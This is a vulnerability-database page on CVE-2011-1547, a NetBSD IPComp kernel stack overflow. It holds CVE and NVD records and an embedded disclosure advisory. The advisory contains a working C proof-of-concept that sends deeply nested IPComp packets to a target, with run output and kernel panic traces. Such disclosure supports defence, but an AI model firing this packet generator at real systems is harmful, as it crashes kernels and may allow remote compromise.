Action not permitted
Modal body text goes here.
Modal Title
Modal Body
cve-2011-1547
Vulnerability from cvelistv5
Published
2011-05-09 19:00
Modified
2024-08-06 22:28
Severity ?
EPSS score ?
Summary
Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T22:28:41.813Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "VU#668220",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/668220"
},
{
"name": "NetBSD-SA2011-004",
"tags": [
"vendor-advisory",
"x_refsource_NETBSD",
"x_transferred"
],
"url": "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc"
},
{
"name": "20110401 BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2011-04-07T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-09-07T09:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "VU#668220",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/668220"
},
{
"name": "NetBSD-SA2011-004",
"tags": [
"vendor-advisory",
"x_refsource_NETBSD"
],
"url": "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc"
},
{
"name": "20110401 BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-1547",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "VU#668220",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/668220"
},
{
"name": "NetBSD-SA2011-004",
"refsource": "NETBSD",
"url": "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc"
},
{
"name": "20110401 BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-1547",
"datePublished": "2011-05-09T19:00:00",
"dateReserved": "2011-03-29T00:00:00",
"dateUpdated": "2024-08-06T22:28:41.813Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"fkie_nvd": {
"configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:netbsd:netbsd:4.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"9875E709-11BA-4B8F-A2FC-26844DD4D563\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:netbsd:netbsd:5.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"00564BAA-066A-4627-B6A8-78724E55D363\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:netbsd:netbsd:5.0.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"E8E6EE58-9C2B-457A-BD0D-EED71A1E4186\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:netbsd:netbsd:5.0.2:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"84241D91-1490-485B-AA07-8335CE458275\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:netbsd:netbsd:5.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"730917F8-E1F4-4836-B05A-16B2BA5774DC\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers.\"}, {\"lang\": \"es\", \"value\": \"Multiples vulnerabilidades de consumos de pila en el Kernel de NetBSD v4.0, v5.0 con anterioridad a v5.0.3 y v5.1 con anterioridad a v5.1.1, IPsec cuando est\\u00e1 activada, permite a atacantes remotos provocar una denegaci\\u00f3n de servicio ( corrupci\\u00f3n de memoria y kernel panic ) o posiblemente tener un impacto no especificado a trav\\u00e9s de paquetes manipulados en ( 1 )IPv4 o ( 2 )IPv6 con cabeceras anidadas IPComp.\"}]",
"id": "CVE-2011-1547",
"lastModified": "2024-11-21T01:26:33.833",
"metrics": "{\"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:M/Au:N/C:P/I:P/A:P\", \"baseScore\": 6.8, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"MEDIUM\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"PARTIAL\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"PARTIAL\"}, \"baseSeverity\": \"MEDIUM\", \"exploitabilityScore\": 8.6, \"impactScore\": 6.4, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
"published": "2011-05-09T19:55:03.553",
"references": "[{\"url\": \"http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc\", \"source\": \"cve@mitre.org\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.kb.cert.org/vuls/id/668220\", \"source\": \"cve@mitre.org\", \"tags\": [\"US Government Resource\"]}, {\"url\": \"http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.kb.cert.org/vuls/id/668220\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"US Government Resource\"]}]",
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-119\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2011-1547\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2011-05-09T19:55:03.553\",\"lastModified\":\"2024-11-21T01:26:33.833\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers.\"},{\"lang\":\"es\",\"value\":\"Multiples vulnerabilidades de consumos de pila en el Kernel de NetBSD v4.0, v5.0 con anterioridad a v5.0.3 y v5.1 con anterioridad a v5.1.1, IPsec cuando est\u00e1 activada, permite a atacantes remotos provocar una denegaci\u00f3n de servicio ( corrupci\u00f3n de memoria y kernel panic ) o posiblemente tener un impacto no especificado a trav\u00e9s de paquetes manipulados en ( 1 )IPv4 o ( 2 )IPv6 con cabeceras anidadas IPComp.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:P/I:P/A:P\",\"baseScore\":6.8,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-119\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:netbsd:netbsd:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9875E709-11BA-4B8F-A2FC-26844DD4D563\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:netbsd:netbsd:5.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"00564BAA-066A-4627-B6A8-78724E55D363\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:netbsd:netbsd:5.0.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E8E6EE58-9C2B-457A-BD0D-EED71A1E4186\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:netbsd:netbsd:5.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"84241D91-1490-485B-AA07-8335CE458275\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:netbsd:netbsd:5.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"730917F8-E1F4-4836-B05A-16B2BA5774DC\"}]}]}],\"references\":[{\"url\":\"http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc\",\"source\":\"cve@mitre.org\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.kb.cert.org/vuls/id/668220\",\"source\":\"cve@mitre.org\",\"tags\":[\"US Government Resource\"]},{\"url\":\"http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.kb.cert.org/vuls/id/668220\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"US Government Resource\"]}]}}"
}
}
gsd-2011-1547
Vulnerability from gsd
Modified
2023-12-13 01:19
Details
Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2011-1547",
"description": "Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers.",
"id": "GSD-2011-1547",
"references": [
"https://packetstormsecurity.com/files/cve/CVE-2011-1547"
]
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2011-1547"
],
"details": "Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers.",
"id": "GSD-2011-1547",
"modified": "2023-12-13T01:19:08.005049Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-1547",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "VU#668220",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/668220"
},
{
"name": "NetBSD-SA2011-004",
"refsource": "NETBSD",
"url": "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc"
},
{
"name": "20110401 BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html"
}
]
}
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-1547"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "NetBSD-SA2011-004",
"refsource": "NETBSD",
"tags": [
"Vendor Advisory"
],
"url": "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc"
},
{
"name": "VU#668220",
"refsource": "CERT-VN",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/668220"
},
{
"name": "20110401 BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload",
"refsource": "FULLDISC",
"tags": [],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html"
}
]
}
},
"impact": {
"baseMetricV2": {
"cvssV2": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"userInteractionRequired": false
}
},
"lastModifiedDate": "2011-09-07T03:16Z",
"publishedDate": "2011-05-09T19:55Z"
}
}
}
var-201105-0256
Vulnerability from variot
Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers. plural IPComp A memory corruption vulnerability exists in the receive processing of the implementation. IPComp (RFC 3173) Generally IPsec Used with the implementation of KAME Projects and NetBSD In projects, etc. IPComp and IPsec The code that implements the crafted IPComp A stack-based buffer overflow can occur when processing the payload. Attack code using this vulnerability has been released.Service disruption by a remote third party (DoS) An attacker may be able to attack or execute arbitrary code. NetBSD is prone to a remote memory-corruption vulnerability because it fails to adequately check for stack overflows in nested IP Payload Compression protocol (IPComp) payloads. Attackers can exploit this issue to trigger a kernel stack overflow, resulting in the execution of arbitrary code with superuser privileges. Failed attacks may cause a denial-of-service condition. A successful exploit will completely compromise affected computers. This issue may affect systems derived from NetBSD IPComp implementations. BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload
Gruezi, this document describes CVE-2011-1547.
RFC3173 ip payload compression, henceforth ipcomp, is a protocol intended to provide compression of ip datagrams, and is commonly used alongside IPSec (although there is no requirement to do so).
An ipcomp datagram consists of an ip header with ip->ip_p set to 108, followed by a 32 bit ipcomp header, described in C syntax below.
struct ipcomp { uint8_t comp_nxt; // Next Header uint8_t comp_flags; // Reserved uint16_t comp_cpi; // Compression Parameter Index };
The Compression Parameter Index indicates which compression algorithm was used to compress the ipcomp payload, which is expanded and then routed as requested. Although the CPI field is 16 bits wide, in reality only 1 algorithm is widely implemented, RFC1951 DEFLATE (cpi=2).
It's well documented that ipcomp can be used to traverse perimeter filtering, however this document discusses potential implementation flaws observed in popular stacks.
The IPComp implementation originating from NetBSD/KAME implements injection of unpacked payloads like so:
algo = ipcomp_algorithm_lookup(cpi);
/* ... */
error = (*algo->decompress)(m, m->m_next, &newlen);
/* ... */
if (nxt != IPPROTO_DONE) {
if ((inetsw[ip_protox[nxt]].pr_flags & PR_LASTHDR) != 0 &&
ipsec4_in_reject(m, NULL)) {
IPSEC_STATINC(IPSEC_STAT_IN_POLVIO);
goto fail;
}
(*inetsw[ip_protox[nxt]].pr_input)(m, off, nxt);
} else
m_freem(m);
/* ... */
Where inetsw[] contains definitions for supported protocols, and nxt is a protocol number, usually associated with ip->ip_p (see http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xml), but in this case from ipcomp->comp_nxt. m is the mbuf structure adjusted to point to the unpacked payload.
The unpacked packet is dispatched to the appropriate protocol handler directly from the ipcomp protocol handler.
The NetBSD/KAME network stack is used as basis for various other operating systems, such as Xnu, FTOS, various embedded devices and network appliances, and earlier versions of FreeBSD/OpenBSD (the code has since been refactored, but see the NOTES section regarding IPComp quines, which still permit remote, pre-authentication, single-packet, spoofed-source DoS in the latest versions).
The Xnu port of this code is close to the original, where the decompressed payload is recursively injected back into the toplevel ip dispatcher. The implementation is otherwise similar, and some alterations to the testcase provided for NetBSD should make it work. This is left as an exercise for the interested reader.
Affected Software
Any NetBSD derived IPComp/IPSec stack may be vulnerable (Xnu, FTOS, etc.).
NetBSD is not distributed with IPSec support enabled by default, however Apple OSX and various other derivatives are. There are so many NetBSD derived network stacks that it is infeasible to check them all, concerned administrators are advised to check with their vendor if there is any doubt.
Major vendors known to use network stacks derived from NetBSD were pre-notified about this vulnerability. If I missed you, it is either not well known that you use the BSD stack, you did not respond to security@ mail, or could not use pgp properly.
Additionally, administrators of critical or major deployments of NetBSD (e.g. dns root servers) were given advance notice in order to deploy appropriate filter rules.
Exploitability of kernel stack overflows will vary by platform (n.b. a stack overflow is not a stack buffer overflow, for a concise definition see TAOCP3,V1,S2.2.2). Also note that a kernel stack overflow is very different from a userland stack overflow.
For further discussion, including attacks on other operating systems, see the notes section on ipcomp quines below. However, this is not a trivial task, and is highly platform dependent.
I have verified kernel stack overflows on NetBSD are exploitable, I have looked at the source code for xnu and do not see any obvious obstacles to prevent exploitation (kernel stack segment limits, guard pages, etc. which would cause the worst impact to be limited to remote denial of service), so have no reason to believe it is different.
Thoughts on this topic from fellow researchers would be welcome.
Source code for a sample Linux program to reproduce this flaw on NetBSD is listed below. Please note, check if your system requires an IPv4 header in the compressed payload before attempting to adapt it to your needs.
include
include
include
include
include
include
include
include
include
include
include
// // BSD IPComp Kernel Stack Overflow Testcase // -- Tavis Ormandy taviso@cmpxchg8b.com, March 2011 //
define MAX_PACKET_SIZE (1024 * 1024 * 32)
define MAX_ENCAP_DEPTH 1024
enum { IPCOMP_OUI = 1, IPCOMP_DEFLATE = 2, IPCOMP_LZS = 3, IPCOMP_MAX, };
struct ipcomp { uint8_t comp_nxt; // Next Header uint8_t comp_flags; // Reserved, must be zero uint16_t comp_cpi; // Compression parameter index uint8_t comp_data[0]; // Payload. };
bool ipcomp_encapsulate_data(void data, size_t size, int nxt, struct ipcomp out, size_t length, int level) { struct ipcomp *ipcomp; z_stream zstream;
ipcomp = malloc(MAX_PACKET_SIZE);
*out = ipcomp;
ipcomp->comp_nxt = nxt;
ipcomp->comp_cpi = htons(IPCOMP_DEFLATE);
ipcomp->comp_flags = 0;
// Compress packet payload.
zstream.zalloc = Z_NULL;
zstream.zfree = Z_NULL;
zstream.opaque = Z_NULL;
if (deflateInit2(&zstream,
level,
Z_DEFLATED,
-12,
MAX_MEM_LEVEL,
Z_DEFAULT_STRATEGY) != Z_OK) {
fprintf(stderr, "error: failed to initialize zlib library\n");
return false;
}
zstream.avail_in = size;
zstream.next_in = data;
zstream.avail_out = MAX_PACKET_SIZE - sizeof(struct ipcomp);
zstream.next_out = ipcomp->comp_data;
if (deflate(&zstream, Z_FINISH) != Z_STREAM_END) {
fprintf(stderr, "error: deflate() failed to create compressed payload, %s\n", zstream.msg);
return false;
}
if (deflateEnd(&zstream) != Z_OK) {
fprintf(stderr, "error: deflateEnd() returned failure, %s\n", zstream.msg);
return false;
}
// Calculate size.
*length = (MAX_PACKET_SIZE - sizeof(struct ipcomp)) - zstream.avail_out;
ipcomp = realloc(ipcomp, *length);
free(data);
return true;
}
int main(int argc, char *argv) { int s; struct sockaddr_in sin = {0}; struct ipcomp ipcomp = malloc(0); size_t length = 0; unsigned depth = 0;
// Nest an ipcomp packet deeply without compression, this allows us to
// create maximum redundancy.
for (depth = 0; depth < MAX_ENCAP_DEPTH; depth++) {
if (ipcomp_encapsulate_data(ipcomp,
length,
IPPROTO_COMP,
&ipcomp,
&length,
Z_NO_COMPRESSION) != true) {
fprintf(stderr, "error: failed to encapsulate data\n");
return 1;
}
}
// Create a final outer packet with best compression, which should now
// compress well due to Z_NO_COMPRESSION used in inner payloads.
if (ipcomp_encapsulate_data(ipcomp,
length,
IPPROTO_COMP,
&ipcomp,
&length,
Z_BEST_COMPRESSION) != true) {
fprintf(stderr, "error: failed to encapsulate data\n");
return 1;
}
fprintf(stdout, "info: created %u nested ipcomp payload, %u bytes\n", depth, length);
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
sin.sin_addr.s_addr = inet_addr(argv[1]);
if ((s = socket(PF_INET, SOCK_RAW, IPPROTO_COMP)) < 0) {
fprintf(stderr, "error: failed to create socket, %m\n");
return 1;
}
if (sendto(s,
ipcomp,
length,
MSG_NOSIGNAL,
(const struct sockaddr *)(&sin),
sizeof(sin)) != length) {
fprintf(stderr, "error: send() returned failure, %m\n");
return 1;
}
fprintf(stdout, "info: success, packet sent to %s\n", argv[1]);
free(ipcomp);
return 0;
}
Packets of the following form are generated.
Internet Protocol, Src: 192.168.1.1, Dst: 192.168.1.2 Version: 4 Header length: 20 bytes Differentiated Services Field: 0x04 (DSCP 0x01: Unknown DSCP; ECN: 0x00) 0000 01.. = Differentiated Services Codepoint: Unknown (0x01) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 205 Identification: 0xc733 (50995) Flags: 0x00 0.. = Reserved bit: Not Set .0. = Don't fragment: Not Set ..0 = More fragments: Not Set Fragment offset: 0 Time to live: 64 Protocol: IPComp (0x6c) Header checksum: 0x2e69 [correct] [Good: True] [Bad : False] Source: 192.168.1.1 Destination: 192.168.1.2 IP Payload Compression Next Header: IPComp (0x6c) IPComp Flags: 0x00 IPComp CPI: DEFLATE (0x0002) Data (181 bytes) Data: 73656158... [Length: 181]
$ gcc ipcomp.c -lz -o ipcomp $ sudo ./ipcomp 192.168.1.2 info: created 1024 nested ipcomp payload, 2538 bytes info: success, packet sent to 192.168.1.2
Mar 25 05:34:40 /netbsd: uvm_fault(0xca7bc774, 0x1000, 1) -> 0xe Mar 25 05:34:40 /netbsd: fatal page fault in supervisor mode Mar 25 05:34:40 /netbsd: trap type 6 code 0 eip c0633269 cs 8 eflags 10202 cr2 1335 ilevel 0 Mar 25 05:34:40 /netbsd: panic: trap Mar 25 05:34:40 /netbsd: Begin traceback... Mar 25 05:34:40 /netbsd: uvm_fault(0xca7bc774, 0, 1) -> 0xe Mar 25 05:34:40 /netbsd: fatal page fault in supervisor mode Mar 25 05:34:40 /netbsd: trap type 6 code 0 eip c06e6c90 cs 8 eflags 10246 cr2 8 ilevel 0 Mar 25 05:34:40 /netbsd: panic: trap Mar 25 05:34:40 /netbsd: Faulted in mid-traceback; aborting...
Adjust depth as required.
(gdb) bt
0 ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:112
1 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
2 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
3 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
4 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
5 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
6 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
[ trimmed ]
148 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
149 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
150 0xc0162bbb in ip_input (m=0xc14e1300) at ../../../../netinet/ip_input.c:1059
151 0xc0161b82 in ipintr () at ../../../../netinet/ip_input.c:476
152 0xc05d6248 in softint_execute (si=0xca79e154, l=0xca7a7a00, s=4) at ../../../../kern/kern_softint.c:539
153 0xc05d60e6 in softint_dispatch (pinned=0xca7a7500, s=4) at ../../../../kern/kern_softint.c:811
(gdb) info frame Stack level 0, frame at 0xcab9bf08: eip = 0xc01ebd5c in ipcomp4_input (../../../../netinet6/ipcomp_input.c:112); saved eip 0xc01ec302 called by frame at 0xcab9bfa8 source language c. Arglist at 0xcab9bf00, args: m=0xc14e1300 Locals at 0xcab9bf00, Previous frame's sp is 0xcab9bf08 Saved registers: ebx at 0xcab9bef8, ebp at 0xcab9bf00, esi at 0xcab9befc, eip at 0xcab9bf04 (gdb) info target Symbols from "netbsd.gdb". Remote serial target in gdb-specific protocol: Debugging a target over a serial line.
Therefore, an oob sp will write attacker controlled data.
(gdb) tb panic Temporary breakpoint 2, panic (fmt=0xc0acf54b "trap") at ../../../../kern/subr_prf.c:184 184 kpreempt_disable(); (gdb) bt
0 panic (fmt=0xc0acf54b "trap") at ../../../../kern/subr_prf.c:184
